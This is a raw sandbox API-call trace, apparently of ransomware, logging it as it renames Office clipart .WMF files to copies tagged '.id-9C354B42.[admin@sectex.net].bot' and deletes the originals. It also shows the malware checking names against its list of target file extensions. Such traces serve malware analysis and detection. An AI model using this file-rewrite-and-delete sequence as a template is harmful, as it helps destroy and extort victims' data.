	[0144.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0
	[0144.605] GetLastError () returned 0x0
	[0144.605] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x820, lpOverlapped=0x0) returned 1
	[0144.618] WriteFile (in: hFile=0x2a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x830, lpOverlapped=0x0) returned 1
	[0144.619] ReadFile (in: hFile=0x31c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.619] WriteFile (in: hFile=0x2a0, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.619] SetEndOfFile (hFile=0x2a0) returned 1
	[0144.619] CloseHandle (hObject=0x2a0) returned 1
	[0144.704] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.704] SetEndOfFile (hFile=0x31c) returned 1
	[0144.706] CloseHandle (hObject=0x31c) returned 1
	[0144.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.920] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 1
	[0144.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.921] lstrlenW (lpString=".doc") returned 4
	[0144.921] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.921] lstrlenW (lpString=".docx") returned 5
	[0144.921] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.921] lstrlenW (lpString=".pdf") returned 4
	[0144.921] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.921] lstrlenW (lpString=".xls") returned 4
	[0144.921] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.921] lstrlenW (lpString=".xlsx") returned 5
	[0144.921] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.921] lstrlenW (lpString=".ppt") returned 4
	[0144.921] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.922] lstrlenW (lpString=".zip") returned 4
	[0144.922] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.922] lstrlenW (lpString=".rar") returned 4
	[0144.922] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString=".bz2") returned 4
	[0144.922] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString=".7z") returned 3
	[0144.922] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.922] lstrlenW (lpString=".dbf") returned 4
	[0144.922] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.922] lstrlenW (lpString=".1cd") returned 4
	[0144.922] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.922] lstrlenW (lpString=".jpg") returned 4
	[0144.922] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.922] lstrlenW (lpString=".doc") returned 4
	[0144.922] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString=".docx") returned 5
	[0144.922] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.922] lstrlenW (lpString=".pdf") returned 4
	[0144.922] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.922] lstrlenW (lpString=".xls") returned 4
	[0144.922] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.922] lstrlenW (lpString=".xlsx") returned 5
	[0144.922] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.922] lstrlenW (lpString=".ppt") returned 4
	[0144.922] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.923] lstrlenW (lpString=".zip") returned 4
	[0144.923] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.923] lstrlenW (lpString=".rar") returned 4
	[0144.923] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.923] lstrlenW (lpString=".bz2") returned 4
	[0144.923] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.923] lstrlenW (lpString=".7z") returned 3
	[0144.923] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.923] lstrlenW (lpString=".dbf") returned 4
	[0144.923] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.923] lstrlenW (lpString=".1cd") returned 4
	[0144.923] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63
	[0144.923] lstrlenW (lpString=".jpg") returned 4
	[0144.923] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.923] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.923] lstrlenW (lpString="DD01172_.WMF") returned 12
	[0144.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.924] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2232) returned 1
	[0144.924] CloseHandle (hObject=0x25c) returned 1
	[0144.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 0x20
	[0144.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0144.924] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.924] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0144.925] GetLastError () returned 0x0
	[0144.925] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x8b8, lpOverlapped=0x0) returned 1
	[0144.944] WriteFile (in: hFile=0x3b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x8c0, lpOverlapped=0x0) returned 1
	[0144.945] ReadFile (in: hFile=0x25c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.945] WriteFile (in: hFile=0x3b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.945] SetEndOfFile (hFile=0x3b4) returned 1
	[0144.945] CloseHandle (hObject=0x3b4) returned 1
	[0144.945] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.945] SetEndOfFile (hFile=0x25c) returned 1
	[0144.949] CloseHandle (hObject=0x25c) returned 1
	[0144.949] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.949] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01172_.wmf")) returned 1
	[0144.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.949] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.949] lstrlenW (lpString=".doc") returned 4
	[0144.949] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.949] lstrlenW (lpString=".docx") returned 5
	[0144.949] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.949] lstrlenW (lpString=".pdf") returned 4
	[0144.950] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString=".xls") returned 4
	[0144.950] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.950] lstrlenW (lpString=".xlsx") returned 5
	[0144.950] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.950] lstrlenW (lpString=".ppt") returned 4
	[0144.950] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.950] lstrlenW (lpString=".zip") returned 4
	[0144.950] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.950] lstrlenW (lpString=".rar") returned 4
	[0144.950] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString=".bz2") returned 4
	[0144.950] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString=".7z") returned 3
	[0144.950] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.950] lstrlenW (lpString=".dbf") returned 4
	[0144.950] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.950] lstrlenW (lpString=".1cd") returned 4
	[0144.950] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.950] lstrlenW (lpString=".jpg") returned 4
	[0144.950] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.950] lstrlenW (lpString=".doc") returned 4
	[0144.950] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.950] lstrlenW (lpString=".docx") returned 5
	[0144.950] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.950] lstrlenW (lpString=".pdf") returned 4
	[0144.950] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.951] lstrlenW (lpString=".xls") returned 4
	[0144.951] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.951] lstrlenW (lpString=".xlsx") returned 5
	[0144.951] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.951] lstrlenW (lpString=".ppt") returned 4
	[0144.951] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.951] lstrlenW (lpString=".zip") returned 4
	[0144.951] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.951] lstrlenW (lpString=".rar") returned 4
	[0144.951] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.951] lstrlenW (lpString=".bz2") returned 4
	[0144.951] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.951] lstrlenW (lpString=".7z") returned 3
	[0144.951] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.951] lstrlenW (lpString=".dbf") returned 4
	[0144.951] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.951] lstrlenW (lpString=".1cd") returned 4
	[0144.951] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01172_.WMF") returned 63
	[0144.951] lstrlenW (lpString=".jpg") returned 4
	[0144.951] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.951] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.951] lstrlenW (lpString="DD01176_.WMF") returned 12
	[0144.951] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0144.966] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1888) returned 1
	[0144.966] CloseHandle (hObject=0x3bc) returned 1
	[0144.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 0x20
	[0144.972] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0144.972] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.972] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.973] GetLastError () returned 0x0
	[0144.973] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x760, lpOverlapped=0x0) returned 1
	[0144.985] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x770, lpOverlapped=0x0) returned 1
	[0144.986] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.986] WriteFile (in: hFile=0x38c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.987] SetEndOfFile (hFile=0x38c) returned 1
	[0144.987] CloseHandle (hObject=0x38c) returned 1
	[0144.987] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.987] SetEndOfFile (hFile=0x3a4) returned 1
	[0144.991] CloseHandle (hObject=0x3a4) returned 1
	[0144.992] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.992] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01176_.wmf")) returned 1
	[0144.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.992] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.992] lstrlenW (lpString=".doc") returned 4
	[0144.992] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.992] lstrlenW (lpString=".docx") returned 5
	[0144.992] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.992] lstrlenW (lpString=".pdf") returned 4
	[0144.992] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.992] lstrlenW (lpString=".xls") returned 4
	[0144.993] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.993] lstrlenW (lpString=".xlsx") returned 5
	[0144.993] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.993] lstrlenW (lpString=".ppt") returned 4
	[0144.993] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.993] lstrlenW (lpString=".zip") returned 4
	[0144.993] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.993] lstrlenW (lpString=".rar") returned 4
	[0144.993] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.993] lstrlenW (lpString=".bz2") returned 4
	[0144.993] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.993] lstrlenW (lpString=".7z") returned 3
	[0144.993] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.993] lstrlenW (lpString=".dbf") returned 4
	[0144.993] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.993] lstrlenW (lpString=".1cd") returned 4
	[0144.993] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.993] lstrlenW (lpString=".jpg") returned 4
	[0144.993] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.993] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.993] lstrlenW (lpString=".doc") returned 4
	[0144.993] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString=".docx") returned 5
	[0144.994] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0144.994] lstrlenW (lpString=".pdf") returned 4
	[0144.994] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString=".xls") returned 4
	[0144.994] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0144.994] lstrlenW (lpString=".xlsx") returned 5
	[0144.994] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0144.994] lstrlenW (lpString=".ppt") returned 4
	[0144.994] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.994] lstrlenW (lpString=".zip") returned 4
	[0144.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0144.994] lstrlenW (lpString=".rar") returned 4
	[0144.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString=".bz2") returned 4
	[0144.994] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString=".7z") returned 3
	[0144.994] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0144.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.994] lstrlenW (lpString=".dbf") returned 4
	[0144.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.994] lstrlenW (lpString=".1cd") returned 4
	[0144.994] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0144.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01176_.WMF") returned 63
	[0144.994] lstrlenW (lpString=".jpg") returned 4
	[0144.994] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0144.995] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0144.995] lstrlenW (lpString="DD01179_.WMF") returned 12
	[0144.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0144.995] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2024) returned 1
	[0144.995] CloseHandle (hObject=0x3a4) returned 1
	[0144.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf")) returned 0x20
	[0144.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01179_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01179_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0144.996] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.996] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
